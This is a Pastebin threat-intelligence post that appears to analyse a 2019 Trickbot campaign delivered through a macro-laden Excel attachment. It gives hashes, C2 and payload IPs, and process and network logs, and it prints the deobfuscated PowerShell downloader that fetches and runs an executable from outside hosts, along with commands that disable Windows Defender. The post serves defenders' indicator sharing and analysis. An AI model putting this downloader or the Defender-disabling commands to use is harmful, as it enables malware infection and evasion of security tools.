SHARE
TWEET

#trickbot_060219

VRad Feb 7th, 2019 (edited) 226 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #Trickbot #X97M #macro #powershell #obfuscated
  2.  
  3. https://pastebin.com/70KhU3a4
  4.  
  5. previous contact:
  6. 05/10/18    https://pastebin.com/75KNqwCf
  7. 02/10/18    https://pastebin.com/fm5Ug69G
  8. 24/09/18    https://pastebin.com/LjuNyGfn
  9.  
  10. FAQ:
  11. https://myonlinesecurity.co.uk/trickbot-via-fake-deloitte-canada-tax-billing/
  12. https://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/
  13. https://radetskiy.wordpress.com/?s=trickbot
  14.  
  15. attack_vector
  16. --------------
  17. email attach .xls > macro > cmd > powershell > GET 2 URL > $env:temp+'\tmp1806.exe
  18.  
  19. email_headers
  20. --------------
  21. n/a
  22.  
  23. files
  24. --------------
  25. SHA-256 2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce
  26. File name   Tax_Billing.xls         [Composite Document File V2 Document]   Type: OLE, AutoExec
  27. File size   57.5 KB
  28.  
  29. SHA-256 1595ecbc00303503b974747aff928d2eacce9b249e0def2ea29ee12191cc6f1a
  30. File name   pro.smoc > tmp1806.exe      [PE32 executable (GUI) Intel 80386, for MS Windows]
  31. File size   313.64 KB
  32.  
  33. activity
  34. **************
  35.  
  36. deobfuscating_macro
  37. --------------
  38. cmd.exe /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));
  39. IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
  40. '""| out-file -filepath %tmp%\tmp9388.bat -encoding ascii; cmd /c '%tmp%\tmp9388.bat'
  41.  
  42. @>
  43.  
  44. powershell "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('... Base64 string ...'));
  45. (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
  46.  
  47. @>
  48.  
  49. function <#release#> TurnOn([string] $pch1){$tuc1=1;try{[System.Net.ServicePointManager]::ServerCertificateVal
  50. idationCallback={$true};(new-object system.net.webclient <#exim#> ).downloadfile($pch1,$env:temp+'\tmp1806.exe
  51. ');}catch{$tuc1=0;}return $tuc1;}$fne1=@('jumpuprecords{.} com/pro.smoc','beersforgears{.} com/pro.smoc');foreach ($
  52. riw in $fne1){if(TurnOn('https://'+$riw) -eq 1){break;} };<#validate#>start-process ($env:temp+'\tmp1806.exe')
  53.  
  54. pl_src:     2
  55. --------------
  56. 69.27.37.10     jumpuprecords{.} com    404
  57. 192.254.185.228 beersforgears{.} com    404
  58.  
  59. C2:
  60. --------------
  61. 190.186.39.82
  62.  
  63. netwrk
  64. --------------
  65. ssl
  66. 69.27.37.10 jumpuprecords{.} com        Client Hello   
  67. 192.254.185.228 beersforgears{.} com        Client Hello   
  68.  
  69. http.request.method == POST
  70. 190.186.39.82   190.186.39.82       POST /ser0205us/APM11_W617601.id/81/    HTTP/1.1    Mozilla/4.0     (!)
  71. 190.186.39.82   190.186.39.82:8082  POST /ser0205us/APM11_W617601.id/90     HTTP/1.1    test        (!)
  72.  
  73. comp
  74. --------------
  75. powershell.exe  1780    TCP 69.27.37.10 443 ESTABLISHED
  76. powershell.exe  1780    TCP 192.254.185.228 443 SYN_SENT
  77. svchost.exe     1504    TCP 46.21.249.220   443 ESTABLISHED
  78. svchost.exe     1504    TCP 2.21.243.40 80  ESTABLISHED
  79. svchost.exe     1504    TCP 47.52.62.55 443 SYN_SENT
  80. svchost.exe     1504    TCP 89.46.223.121   447 ESTABLISHED
  81.  
  82. svchost.exe     1504    TCP zimbabweemergencyassistance{.} com                      https   ESTABLISHED
  83. svchost.exe     1504    TCP a2-21-243-40.deploy.static.akamaitechnologies{.} com    http    ESTABLISHED
  84.  
  85. proc
  86. --------------
  87. C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE /e
  88. C:\Windows\SysWOW64\cmd.exe  /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'""| out-file -filepath %tmp%\tmp9388.bat -encoding ascii; cmd /c '%tmp%\tmp9388.bat'
  89. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'""| out-file -filepath C:\tmp\tmp9388.bat -encoding ascii; cmd /c 'C:\tmp\tmp9388.bat'
  90. C:\Windows\SysWOW64\cmd.exe /c C:\tmp\tmp9388.bat
  91. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('... Base64 string ...'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
  92. @>
  93. C:\tmp\tmp1806.exe
  94. C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
  95. C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
  96. C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  97. @>
  98. C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
  99. C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
  100. C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
  101. C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  102. @>
  103. C:\Windows\system32\svchost.exe
  104. @>
  105. C:\Windows\system32\svchost.exe -k netsvcs
  106. C:\Windows\system32\taskeng.exe {BBC0F265-32F9-4766-909F-D34E8EEF3FFB} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
  107. C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
  108. C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
  109. C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
  110. C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  111. C:\Windows\system32\svchost.exe
  112.  
  113. persist
  114. --------------
  115. Task Scheduler
  116. \CleanMemoryWinTask         c:\users\operator\appdata\roaming\cleanmem\tnq1907.exe  06.02.2019 16:55
  117.  
  118. drop
  119. --------------
  120. C:\Users\operator\AppData\Roaming\cleanmem\grabber_temp.INTEG.RAW
  121. C:\Users\operator\AppData\Roaming\cleanmem\tmp.edb
  122. C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
  123. C:\Users\operator\AppData\Roaming\cleanmem\vlc-qt-interface.ini
  124. C:\Users\operator\AppData\Roaming\cleanmem\injectDll64_configs
  125. C:\Users\operator\AppData\Roaming\cleanmem\mailsearcher64_configs
  126. C:\Users\operator\AppData\Roaming\cleanmem\networkDll64_configs
  127. C:\Users\operator\AppData\Roaming\cleanmem\psfin64_configs
  128. C:\Users\operator\AppData\Roaming\cleanmem\pwgrab64_configs
  129. C:\Users\operator\AppData\Roaming\cleanmem\importDll64
  130. C:\Users\operator\AppData\Roaming\cleanmem\injectDll64
  131. C:\Users\operator\AppData\Roaming\cleanmem\mailsearcher64
  132. C:\Users\operator\AppData\Roaming\cleanmem\networkDll64
  133. C:\Users\operator\AppData\Roaming\cleanmem\psfin64
  134. C:\Users\operator\AppData\Roaming\cleanmem\pwgrab64
  135. C:\Users\operator\AppData\Roaming\cleanmem\shareDll64
  136. C:\Users\operator\AppData\Roaming\cleanmem\systeminfo64
  137. C:\Users\operator\AppData\Roaming\cleanmem\wormwinDll64
  138.  
  139. # # #
  140. https://www.virustotal.com/#/file/2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce/details
  141. https://www.virustotal.com/#/url/240554f90c39c2c914803a8ee2c295d5c848482f82138d20a236d6b71b2c823c/details
  142. https://www.virustotal.com/#/url/0b963e7eb53d1d7cbca89b53b376530a92abb5bf7a5fff97f100a0545545b34d/details
  143. https://urlhaus.abuse.ch/url/118629/
  144. https://urlhaus.abuse.ch/url/118628/
  145.  
  146. https://www.virustotal.com/#/file/1595ecbc00303503b974747aff928d2eacce9b249e0def2ea29ee12191cc6f1a/details
  147. https://analyze.intezer.com/#/analyses/66286e3c-deca-480c-9f36-caebee871a10
  148.  
  149. VR
  150.  
  151. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top